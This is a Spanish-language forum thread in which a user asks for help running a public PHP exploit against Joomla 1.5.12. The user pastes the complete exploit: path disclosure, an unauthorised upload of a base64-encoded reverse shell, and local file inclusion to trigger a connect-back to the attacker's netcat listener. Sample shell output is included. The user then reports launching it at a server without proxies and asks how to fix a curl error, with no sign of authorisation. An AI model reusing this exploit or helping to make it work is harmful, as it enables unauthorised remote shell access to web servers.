Tema: parametro puerto para exploit (Leído 4,624 veces)
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hola buenas, tengo un exploit en php para lanzar a un server web y tener shell. La duda es un poco tonta, es sobre los parametros. Los parametros que me pide son la ip del server web, un puerto del server (cogere el 80 q esta abierto), mi ip(sera la externa digo yo), y la gran duda es que me pide un puerto mio para la shell. ¿Este puerto mio debe de estar abierto en el sistema operativo y en el router?
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Sí, será el puerto en el que tendrás que tener esperando para obtener el reverse shell. La duda es de qué tipo es el exploit. Yo de tí probaría a correr el netcat en el puerto que tu quieras, abrirlo en tu router y correr el exploit con el número de ese puerto. De todos modos, me falta información  Pásame el exploit y concreto un poco más...
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Muchas gracias, hay va el codigo en php: # Title: Joomla 1.5.12 connect back exploit # EDB-ID: 11262 # CVE-ID: () # OSVDB-ID: () # Author: Nikola Petrov # Published: 2010-01-26 # Verified: no # Download Exploit Code # Download N/A #!/usr/bin/php <?php /* Copyright (c) ITIX LTD This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <>. TITLE: Joomla 1.5.12 connect back exploit AUTHOR: Nikola Petrov ( VERSION: 1.0 LICENSE: GNU General Public License Platform: Joomla 1.5.12 Vulnerabilities discovery and implementation: Nikola Petrov ( Date: 27.08.2009 Joomla 1.5.12 suffers from different kinds of vulnerabilities: - path disclosure - unauthorized file upload - local file inclusion I heard of unauthorized file upload in Joomla 1.5.12 and I decided to make some research on the topic. Soon after that I found two more vulnerabilities - path disclosure and local file inclusion. Maybe there are more vulnerabilities but these are enough to get a connection back from the server. Path disclosure: joomla/libraries/joomla/client/ldap.php Unauthorized file upload: joomla/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php (upload_file.php) Local file inclusion: joomla/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php Here is the LFI vulnerability: -- snip-snip: folders.php -- <?php require_once('config_tinybrowser.php'); // Set language if(isset($tinybrowser['language']) && file_exists('langs/'.$tinybrowser['language'].'.php')) { require_once('langs/'.$tinybrowser['language'].'.php'); } else { require_once('langs/en.php'); // Falls back to English } ... -- snip-snip -- [wadmin@M01 1.5.12]$ ./jtiny-1-5-12.php % 80 / % 9090 [+] web root: /var/www/html [+] tinybrowser secret: s0merand0mjunk!!!111 [+] Shell successfully uploaded. [+] Executing shell... [wadmin@M01 1.5.12]$ [wadmin@M01 /]$ nc -vvv -l 9090 Connection from port 9090 [tcp/websm] accepted id && uname -a uid=48(apache) gid=48(apache) groups=48(apache) Linux M01 2.6.30 #1 SMP Tue Jun 16 19:34:59 EEST 2009 i686 i686 i386 GNU/Linux exit [wadmin@M01 /]$ */ if($argc < 6) { print "\tvulnerabilities discovery and implementation: Nikola Petrov (\n"; print "\tusage: ./jtiny-1-5-12.php <remote host> <remote port> <remote path> <local address> <local port> [remote doc root] [tinybrowser secret/obfuscate]\n"; print "\texample: jtiny-1-5-12.php % 80 / % 9090\n\n"; exit(); } $RemoteHost = $argv[1]; $RemotePort = $argv[2]; $RemotePath = $argv[3]; $LocalAddress = $argv[4]; $LocalPort = $argv[5]; if($argc == 7) $RemoteDocRoot = $argv[6]; else $RemoteDocRoot = getRemoteDocRoot($RemoteHost, $RemotePath); if($argc == 8) $Secret = $argv[7]; else $Secret = "s0merand0mjunk!!!111"; print "[+] web root: $RemoteDocRoot\n"; print "[+] tinybrowser secret: $Secret\n"; $Shell = "PD9waHAKCSRBZGRyZXNzID0gJF9HRVRbJ19yYWRkcmVz". "cyddOwoJJFBvcnQgPSAkX0dFVFsnX3Jwb3J0J107CgoJ". "QCRTb2NrZXQgPSBzdHJlYW1fc29ja2V0X2NsaWVudCgi". "dGNwOi8vJEFkZHJlc3M6JFBvcnQiKSBvciBkaWUoIkNh". "bm5vdCBjb25uZWN0IGJhY2sgYXQgJEFkZHJlc3M6JFBv". "cnRcbiIpOwoJJFByb2MgPSBwcm9jX29wZW4oJy9iaW4v". "c2gnICxhcnJheShhcnJheSgncGlwZScsJ3InKSAsYXJy". "YXkoJ3BpcGUnLCd3JykgLGFycmF5KCdwaXBlJywndycp". "KSwgJFApOwoJCgkkUEk9JFBbMF07CgkkUE89JFBbMV07". "CgkkUEU9JFBbMl07CgoJJE51bGwgPSBudWxsOwoKCXdo". "aWxlKDEpIHsKCQkkU0w9YXJyYXkoJFNvY2tldCwkUE8s". "JFBFKTsKCQlzdHJlYW1fc2VsZWN0KCRTTCwgJE51bGws". "ICROdWxsLCAxKTsKCgkJZm9yZWFjaCgkU0wgYXMgJiRW". "KSAgewoJCQlpZigkVj09PSRTb2NrZXQpIGZ3cml0ZSgk". "UEksZnJlYWQoJFNvY2tldCwgNDA5NikpOwoJCQllbHNl". "aWYgKCRWPT09JFBPKSBmd3JpdGUoJFNvY2tldCxmcmVh". "ZCgkUE8sIDQwOTYpKTsKCQkJZWxzZWlmKCRWPT09JFBF". "KSBmd3JpdGUoJFNvY2tldCxmcmVhZCgkUEUsIDQwOTYp". "KTsKCQkJaWYoZmVvZigkU29ja2V0KSB8fCBmZW9mKCRQ". "TykpIGV4aXQ7CgkJfQoJfQo/Pgo="; $File = fopen("./_shell", "w") or die("Cannot open: ./_shell"); fwrite($File, base64_decode($Shell)); fclose($File); #print "uploadFile($RemoteHost, $RemotePath, ./_shell, md5($RemoteDocRoot.$Secret)\n"; if(uploadFile($RemoteHost, $RemotePath, "./_shell", md5($RemoteDocRoot.$Secret)) == false) { print "[-] Cannot upload shell.\n\n"; unlink("_shell"); exit(); } else print "[+] Shell successfully uploaded.\n"; unlink("_shell"); print "[+] Executing shell...\n"; shellExec($RemoteHost, $RemotePath, $RemoteDocRoot, $LocalAddress, $LocalPort); function getRemoteDocRoot($aRemoteHost, $aRemotePath) { $Client = curl_init(); curl_setopt($Client, CURLOPT_URL, $aRemoteHost . $aRemotePath . "/libraries/joomla/client/ldap.php"); curl_setopt($Client, CURLOPT_RETURNTRANSFER, 1) ; curl_setopt($Client, CURLOPT_HEADER, 0); $Response = curl_exec($Client); if(($HttpCode = curl_getinfo($Client, CURLINFO_HTTP_CODE)) != 200) { print "[-] getRemoteDocRoot() recieved http code $HttpCode.\n"; exit(); } curl_close($Client); $Step1 = strpos($Response, "not found in <b>") + 16; $Step2 = strpos($Response, "/libraries/joomla/"); if(strlen($aRemotePath) > 1) return substr(substr($Response, $Step1, $Step2 - $Step1), 0, -strlen($aRemotePath)); else return substr($Response, $Step1, $Step2 - $Step1); } function uploadFile($aRemoteHost, $aRemotePath, $aFilePath, $aSecret) { $Client = curl_init("http://$aRemoteHost$aRemotePath/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload_file.php?folder=". $aRemotePath ."/images/stories&type=image&feid=&obfuscate=$aSecret&sessidpass="); curl_setopt($Client, CURLOPT_POSTFIELDS, array('Filedata'=>"@$aFilePath")); curl_setopt($Client, CURLOPT_RETURNTRANSFER, 1); $Response = curl_exec($Client); if(($HttpCode = curl_getinfo($Client, CURLINFO_HTTP_CODE)) != 200) { print "[-] uploadFile() recieved http code $HttpCode.\n"; exit(); } curl_close($Client); return strpos($Response, "File Upload Success"); } function shellExec($aRemoteHost, $aRemotePath, $aRemoteDocRoot, $aLocalAddress, $aLocalPort) { $Shell = "../../../../../../../../../../../../../../../../../../../../../../../../../../". $aRemoteDocRoot . $aRemotePath ."/images/stories/_shell_%00"; $VulnerableFile = $aRemoteHost . $aRemotePath . "/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php?_raddress=$aLocalAddress&_rport=$aLocalPort"; $Client = curl_init(); curl_setopt($Client, CURLOPT_URL, $VulnerableFile); curl_setopt($Client, CURLOPT_RETURNTRANSFER, 1) ; curl_setopt($Client, CURLOPT_HEADER, 0); curl_setopt($Client, CURLOPT_COOKIE, "tinybrowser_lang=$Shell"); $Response = curl_exec($Client); curl_close($Client); print $Response; } ?>
Para abrir el puerto en backtrack utilizare iptables -A INPUT -p tcp --dport 1414 -j ACCEPT
No he aguantado mas y he lanzado el exploit sin proxys, abriendo los puertos en el router, en backtrack y me da un error: Fatal error: Call to undefined function curl_init() in /usr/bin/exploit.php on line 166
lo que pongo es : ./php exploit.php ipserver 80 / ipmia 1234 ipserver/
¿Podeis echarme una mano de que puede estar fallando?
« Última modificación: 9 Marzo 2012, 20:11 pm por sancakoky »
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